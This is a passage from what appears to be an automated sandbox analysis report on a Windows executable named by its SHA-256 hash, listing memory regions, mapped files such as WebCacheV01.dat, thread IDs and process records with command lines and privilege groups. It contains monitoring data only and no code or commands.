filename = "" Region: id = 753 start_va = 0x540000 end_va = 0x542fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "wer.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\wer.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\wer.dll.mui") Region: id = 754 start_va = 0x550000 end_va = 0x553fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 755 start_va = 0x6680000 end_va = 0x6e7ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006680000" filename = "" Region: id = 756 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 757 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 758 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 759 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 760 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 761 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 762 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 763 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 764 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 765 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 766 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 767 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 768 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 769 start_va = 0x6680000 end_va = 0x677ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000006680000" filename = "" Region: id = 770 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 771 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 772 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 773 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 774 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 775 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 776 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 777 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 778 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 779 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 780 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 781 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 782 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 783 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 784 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 785 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 786 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 787 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 788 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 789 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 790 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 791 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 792 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 793 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 794 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 795 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 796 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 797 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 798 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 799 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Region: id = 800 start_va = 0x560000 end_va = 0x56afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000560000" filename = "" Thread: id = 14 os_tid = 0xc34 Thread: id = 15 os_tid = 0x4a4 Thread: id = 16 os_tid = 0xc40 Process: id = "5" image_name = "f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" filename = "c:\\users\\rdhj0cnfevzx\\desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe" page_root = "0x384ef000" os_pid = "0x13e4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "1" os_parent_pid = "0x5bc" cmd_line = "\"C:\\Users\\RDhJ0CNFevzX\\Desktop\\f811cfc4610369aee904c7c14d67b944f7b6f6fe0e26d7220385295c726272cd.exe\" " cur_dir = "C:\\Windows\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Process: id = "6" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0xb042000" os_pid = "0x884" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "1" os_parent_pid = "0x278" cmd_line = "C:\\Windows\\system32\\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f142" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 801 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 802 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 803 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 804 start_va = 0x50000 end_va = 0x14ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 805 start_va = 0x150000 end_va = 0x153fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000150000" filename = "" Region: id = 806 start_va = 0x160000 end_va = 0x161fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000160000" filename = "" Region: id = 807 start_va = 0x170000 end_va = 0x170fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000170000" filename = "" Region: id = 808 start_va = 0x180000 end_va = 0x186fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000180000" filename = "" Region: id = 809 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000190000" filename = "" Region: id = 810 start_va = 0x1a0000 end_va = 0x1a0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001a0000" filename = "" Region: id = 811 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001b0000" filename = "" Region: id = 812 start_va = 0x1c0000 end_va = 0x1c0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001c0000" filename = "" Region: id = 813 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 814 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 815 start_va = 0x1f0000 end_va = 0x1f7fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001f0000" filename = "" Region: id = 816 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 817 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 818 start_va = 0x4c0000 end_va = 0x4cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004c0000" filename = "" Region: id = 819 start_va = 0x4d0000 end_va = 0x4dffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004d0000" filename = "" Region: id = 820 start_va = 0x4e0000 end_va = 0x4effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004e0000" filename = "" Region: id = 821 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000004f0000" filename = "" Region: id = 822 start_va = 0x500000 end_va = 0x50ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000500000" filename = "" Region: id = 823 start_va = 0x510000 end_va = 0x51ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000510000" filename = "" Region: id = 824 start_va = 0x520000 end_va = 0x520fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000520000" filename = "" Region: id = 825 start_va = 0x530000 end_va = 0x530fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000530000" filename = "" Region: id = 826 start_va = 0x540000 end_va = 0x543fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000540000" filename = "" Region: id = 827 start_va = 0x550000 end_va = 0x551fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000550000" filename = "" Region: id = 828 start_va = 0x560000 end_va = 0x560fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000560000" filename = "" Region: id = 829 start_va = 0x570000 end_va = 0x66ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 830 start_va = 0x670000 end_va = 0x67ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 831 start_va = 0x680000 end_va = 0x68ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 832 start_va = 0x690000 end_va = 0x69ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 833 start_va = 0x6a0000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 834 start_va = 0x6b0000 end_va = 0x6bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 835 start_va = 0x6c0000 end_va = 0x6cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 836 start_va = 0x6d0000 end_va = 0x6dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 837 start_va = 0x6e0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 838 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 839 start_va = 0x700000 end_va = 0x70ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 840 start_va = 0x710000 end_va = 0x71ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 841 start_va = 0x720000 end_va = 0x72ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000720000" filename = "" Region: id = 842 start_va = 0x730000 end_va = 0x73ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 843 start_va = 0x740000 end_va = 0x74ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 844 start_va = 0x750000 end_va = 0x75ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 845 start_va = 0x760000 end_va = 0x76ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 846 start_va = 0x770000 end_va = 0x77ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 847 start_va = 0x780000 end_va = 0x78ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 848 start_va = 0x790000 end_va = 0x79ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 849 start_va = 0x7a0000 end_va = 0x7affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 850 start_va = 0x7b0000 end_va = 0x7bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 851 start_va = 0x7c0000 end_va = 0x7cffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 852 start_va = 0x7d0000 end_va = 0x7dffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 853 start_va = 0x7e0000 end_va = 0x7effff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 854 start_va = 0x7f0000 end_va = 0x7fffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 855 start_va = 0x800000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 856 start_va = 0x810000 end_va = 0x81ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 857 start_va = 0x820000 end_va = 0x827fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000820000" filename = "" Region: id = 858 start_va = 0x830000 end_va = 0x83ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 859 start_va = 0x840000 end_va = 0x847fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000840000" filename = "" Region: id = 860 start_va = 0x870000 end_va = 0x877fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000870000" filename = "" Region: id = 861 start_va = 0x880000 end_va = 0x881fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000880000" filename = "" Region: id = 862 start_va = 0x8b0000 end_va = 0x8bffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 863 start_va = 0x8c0000 end_va = 0x8cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008c0000" filename = "" Region: id = 864 start_va = 0x8d0000 end_va = 0x9cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000008d0000" filename = "" Region: id = 865 start_va = 0x9d0000 end_va = 0xacffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000009d0000" filename = "" Region: id = 866 start_va = 0xad0000 end_va = 0xbcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000ad0000" filename = "" Region: id = 867 start_va = 0xbd0000 end_va = 0xd57fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000bd0000" filename = "" Region: id = 868 start_va = 0xd60000 end_va = 0xee0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000d60000" filename = "" Region: id = 869 start_va = 0xef0000 end_va = 0x22effff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ef0000" filename = "" Region: id = 870 start_va = 0x22f0000 end_va = 0x22fffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000022f0000" filename = "" Region: id = 871 start_va = 0x2300000 end_va = 0x230ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002300000" filename = "" Region: id = 872 start_va = 0x2310000 end_va = 0x231ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002310000" filename = "" Region: id = 873 start_va = 0x2320000 end_va = 0x232ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002320000" filename = "" Region: id = 874 start_va = 0x2330000 end_va = 0x233ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002330000" filename = "" Region: id = 875 start_va = 0x2340000 end_va = 0x234ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002340000" filename = "" Region: id = 876 start_va = 0x2370000 end_va = 0x237ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 877 start_va = 0x2380000 end_va = 0x238ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 878 start_va = 0x2390000 end_va = 0x239ffff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 879 start_va = 0x23a0000 end_va = 0x23affff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "webcachev01.dat" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\WebCache\\WebCacheV01.dat" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\webcache\\webcachev01.dat") Region: id = 880 start_va = 0x23b0000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023b0000" filename = "" Region: id = 881 start_va = 0x23c0000 end_va = 0x24bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000023c0000" filename = "" Region: id = 882 start_va = 0x25c0000 end_va = 0x28f6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 883 start_va = 0x2900000 end_va = 0x38fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002900000" filename = "" Region: id = 884 start_va = 0x3900000 end_va = 0x398ffff monitored = 1 entry_point = 0x0 region_type = 